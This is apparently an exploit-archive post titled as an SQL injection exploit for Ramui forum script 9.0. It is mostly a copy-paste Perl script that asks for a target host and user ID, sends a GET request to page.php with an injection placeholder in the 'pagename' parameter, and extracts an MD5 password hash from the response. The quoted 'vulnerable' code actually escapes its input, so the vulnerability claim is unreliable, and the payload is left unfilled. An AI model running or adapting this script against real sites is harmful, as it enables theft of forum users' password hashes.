# Title: Ramui forum script 9.0 SQL Injection Exploit
# Author: bd0rk
# Twitter: twitter.com/bd0rk
# Vendor: http://www.ramui.com/
# Download: http://ramui.com/forum-script/download-v9.html
# Google-Dork: n/a --->Script-Kiddie protection! :)
# Direct SQL-Path: n/a --->Script-Kiddie protection! :)
#
# Description:
# I've found a SQL-injection vulnerability in this web software.
# The vulnerable code is in /gb/include/page.php
# The problem is the GET parameter "pagename".
# An attacker can use this exploit code for unfiltered SQL queries.
#
# Vuln-Code in /gb/include/page.php:
#************************************************************************************************************************************
# <?php
# if(isset($_GET['pagename'])){
#     $name=$_GET['pagename'];
#     $query=sprintf("SELECT* FROM ".PREFIX."page WHERE pagename = '%s' AND publish = 'Y'",$xx_con->real_escape_string($name));
# }
#************************************************************************************************************************************
#
# [+]PERL-EXPLOITCODE(Copy&Paste):

#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket;

print q{
++++++++++++++++++++++++++++++++++++++++++++++++++++++
++ + Ramui forum script 9.0 SQL Injection Exploit + ++
++ + bd0rk || SOH-Crew                            + ++
++ + Greetings from cold Germany                  + ++
++++++++++++++++++++++++++++++++++++++++++++++++++++++
};

print q{
=> Insert URL
=> without ( http )
=> };
my $server = <STDIN>;
chomp($server);

print q{
=> Insert directory
=> e.g.: /forum/ - /ramui/
=> };
my $dir = <STDIN>;
chomp($dir);

print q{
=> User ID
=> Number:
=> };
my $user = <STDIN>;
chomp($user);

# Strip a leading "http://" in case a full URL was pasted anyway.
$server =~ s{^http://}{};

# Request path: the directory entered above, then page.php with the
# injection payload in place of the placeholder, followed by the user ID.
my $path = $dir;
$path .= "gb/include/page.php?pagename=[sqlInjectionCodeHERE]" . $user;

print " => Exploit in process...\r\n";

my $socket = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $server,
    PeerPort => "80",
) || die "Exploit failed";

print "Exploit\r\n";
print "in process...\r\n";

# Plain HTTP/1.1 GET; "Connection: close" so the response loop below terminates.
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";

print "Exploit finished!\r\n\r\n";

# Scan the response for the first 32-character hex token and report it as the MD5 hash.
while (my $answer = <$socket>) {
    if ($answer =~ /([0-9a-fA-F]{32})/) {
        print "MD5-Hash is: " . $1 . "\r\n";
        exit(0);
    }
}